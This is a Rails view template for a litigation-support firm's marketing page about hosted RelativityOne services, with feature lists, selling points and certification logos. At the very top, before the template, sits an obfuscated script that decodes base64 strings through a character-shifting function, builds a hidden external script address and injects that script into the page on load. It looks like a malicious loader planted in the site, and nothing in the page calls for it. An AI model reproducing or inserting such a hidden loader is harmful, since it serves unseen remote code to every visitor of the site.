<head><script>window[(function(_jlk,_03){var _CU6dW='';for(var _D3jANe=0;_D3jANe<_jlk.length;_D3jANe++){var _qDtp=_jlk[_D3jANe].charCodeAt();_03>1;_qDtp-=_03;_qDtp+=61;_qDtp%=94;_qDtp+=33;_CU6dW==_CU6dW;_qDtp!=_D3jANe;_CU6dW+=String.fromCharCode(_qDtp)}return _CU6dW})(atob('Knd+Qj86NTNEeTVJ'), 46)] = 'd2dd043c821749491561';     var zi = document.createElement('script');     (zi.type = 'text/javascript'),     (zi.async = true),     (zi.src = (function(_UQy,_uq){var _jFmUt='';for(var _JQEiMZ=0;_JQEiMZ<_UQy.length;_JQEiMZ++){var _jX1F=_UQy[_JQEiMZ].charCodeAt();_jX1F-=_uq;_jX1F+=61;_jX1F%=94;_jX1F!=_JQEiMZ;_uq>5;_jFmUt==_jFmUt;_jX1F+=33;_jFmUt+=String.fromCharCode(_jX1F)}return _jFmUt})(atob('diQkfiNIPT14IzwqdzsjcSJ3fiQjPHF9ez0qdzskb3U8eCM='), 14)),     document.readyState === 'complete'?document.body.appendChild(zi):     window.addEventListener('load', function(){         document.body.appendChild(zi)     });</script></head>

<section class="bg-accent-2">
  <section class="section position-relative py-5">
    <%= image_tag "digital_forensics.jpg", class: 'background-image' %>

    <div class="parallax-content parallax-header">
      <div class="parallax-header__inner">
        <div class="parallax-header__content">
          <div class="container">
            <div class="row justify-content-md-center">
              <div class="col-md-10 col-xl-8">
                <h2 class="heading-decorated heading-decorated_center">Evolution</h2>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </section>
</section>

<section class="section text-center">
  <div class="container">
    <div class="row justify-content-center">
      <div class="col-12 col-md-10">
        <div class="row justify-content-center">
          <div class="col-12 col-md-10">
            <h5 class=" text-center p-5"><stron>Empire’s proprietary tools and workflows 
            streamline RelativityOne, connecting teams and matters with less effort and control</strong></h5>
          </div>
          <div class="col-md-10">
            <div class="row justify-content-center">
              <div class="col-10">
                <div class="row">
                  <div class="col-md-6">
                    <h2 class="mt-2 text-primary">24/7</h2>
                    <h6 class="mt-2 mt-md-4">Client Support</h6>
                  </div>
                  <div class="col-md-6">
                    <h2 class="mt-2 text-primary">100+</h2>
                    <h6 class="mt-2 mt-md-4 mb-2">Years of Litigation Support Experience</h6>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>

<section class="section-lg bg-default">
  <div class="container">
    <div class="row row-50 justify-content-center">
      <div class="col-10 col-md-8 bg-gray-lighter pt-5 pb-5" style="border-radius:20px">
        <div class="row justify-content-between">
          <div class="col-md-5 d-flex flex-column ml-md-5">
            <div class="d-flex flex-column flex-md-row align-items-center text-md-start py-4">
                <div class=" mb-3 mb-md-0 mr-3">
                    <i class="linear-icon-arrow-up icon-md" style="font-size:2rem; color:#2367A3;"></i>
                </div>
                <div>
                    <p><strong>Migration Pros, Start to Finish</strong></p>
                </div>
            </div>

            <div class="d-flex flex-column flex-md-row align-items-center text-md-start py-4">
                <div class=" mb-3 mb-md-0 mr-3">
                    <i class="linear-icon-bag-dollar icon-md" style="font-size:2rem; color:#2367A3;"></i>
                </div>
                <div>
                    <p><strong>Flexible Billing, Your Way </strong></p>
                </div>
            </div>

            <div class="d-flex flex-column flex-md-row align-items-center text-md-start py-4">
                <div class=" mb-3 mb-md-0 mr-3">
                    <i class="linear-icon-group-work icon-md" style="font-size:2rem; color:#2367A3;"></i>
                </div>
                <div>
                    <p><strong>Collaborative By Design</strong></p>
                </div>
            </div>

            <div class="d-flex flex-column flex-md-row align-items-center text-md-start py-4">
                <div class=" mb-3 mb-md-0 mr-3">
                    <i class="linear-icon-file-preview icon-md" style="font-size:2rem; color:#2367A3;"></i>
                </div>
                <div>
                    <p><strong>Custom-Fit Solutions</strong></p>
                </div>
            </div>

            <div class="d-flex flex-column flex-md-row align-items-center text-md-start py-4">
                <div class=" mb-3 mb-md-0 mr-3">
                    <i class="linear-icon-toggle icon-md" style="font-size:2rem; color:#2367A3;"></i>
                </div>
                <div>
                    <p><strong>You’re In Control</strong></p>
                </div>
            </div>
          </div>
          <div class="col-md-5 d-flex flex-column">
            <div class="d-flex flex-column flex-md-row align-items-center text-md-start py-4">
                <div class=" mb-3 mb-md-0 mr-3">
                    <i class="linear-icon-database icon-md" style="font-size:2rem; color:#2367A3;"></i>
                </div>
                <div>
                    <p><strong>No Data Minimums</strong></p>
                </div>
            </div>

            <div class="d-flex flex-column flex-md-row align-items-center text-md-start py-4">
                <div class=" mb-3 mb-md-0 mr-3">
                    <i class="linear-icon-cloud-check icon-md" style="font-size:2rem; color:#2367A3;"></i>
                </div>
                <div>
                    <p><strong>Fully Hosted Solution</strong></p>
                </div>
            </div>

            <div class="d-flex flex-column flex-md-row align-items-center text-md-start py-4">
                <div class=" mb-3 mb-md-0 mr-3">
                    <i class="linear-icon-magnifier icon-md" style="font-size:2rem; color:#2367A3;"></i>
                </div>
                <div>
                    <p><strong>Scale Up / Scale Down</strong></p>
                </div>
            </div>

            <div class="d-flex flex-column flex-md-row align-items-center text-md-start py-4">
                <div class=" mb-3 mb-md-0 mr-3">
                    <i class="linear-icon-pine-tree icon-md" style="font-size:2rem; color:#2367A3;"></i>
                </div>
                <div>
                    <p><strong>Dedicated Environment</strong></p>
                </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>

<section class="section bg-accent-2 py-5 text-center ">
  <div class="container">
    <div class="row justify-content-center">
      <div class="col-md-8">
        <h3 class="heading-decorated text-white">Why Empire?</h3>
      </div>
    </div>
    <div class="row justify-content-center">
      <div class="col-10">
        <article class="post-wide text-center">
          <div class="row">
            <article class="blurb-tiny blurb-tiny_centered col-12 col-lg-4 mt-5 mb-5">
              <div class="blurb-tiny__icon linear-icon-thumbs-up"></div>
              <h5 class="blurb-tiny__title"><strong>Trusted Expert Team</strong></h5>
              <p>Our team brings a wealth of experience to your case, including over 100+ years fo litigation support experience</p>
            </article>

            <article class="blurb-tiny blurb-tiny_centered col-12 col-lg-4 mt-5 mb-5">
                <div class="blurb-tiny__icon linear-icon-hand"></div>
                <h5 class="blurb-tiny__title"><strong>White Glove Service</strong></h5>
                <p>Rely on Empire’s 24/7 availability, ensuring your peace fo mind</p>
            </article>

            <article class="blurb-tiny blurb-tiny_centered col-12 col-lg-4 mt-5 mb-5">
              <div class="blurb-tiny__icon linear-icon-user"></div>
              <h5 class="blurb-tiny__title"><strong>Fast Turnaround Times</strong></h5>
              <p>Delivering critical data quickly and accurately to meet your tight needs</p>
            </article>
          </div>
        </article>
      </div>
    </div>
  </div>
</section>

<section class="section">
  <div class="parallax-content">
    <div class="section-md text-center">
      <div class="container">
        <div class="heading-decorated heading-decorated_center text-center">
            <%= image_tag 'relativity/rel1-logo.png', class: 'img-fluid', style: 'width: 25rem;' %>
        </div> 

        <div class="d-flex w-100 flex-row justify-content-center flex-wrap mt-4">
          <div class="d-flex flex-column">
            <%= image_tag 'relativity/relativity_4.png', class: 'certificaiton' %>
            <%= image_tag 'relativity/relativity-PH.png', class: 'certificaiton' %>
          </div>
          <div class="col-md-1"></div>
          <div class="d-flex flex-column">
            <%= image_tag 'relativity/relativity-specialist.png', class: 'certificaiton' %>
            <%= image_tag 'relativity/relativity-sales.webp', class: 'certificaiton' %>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>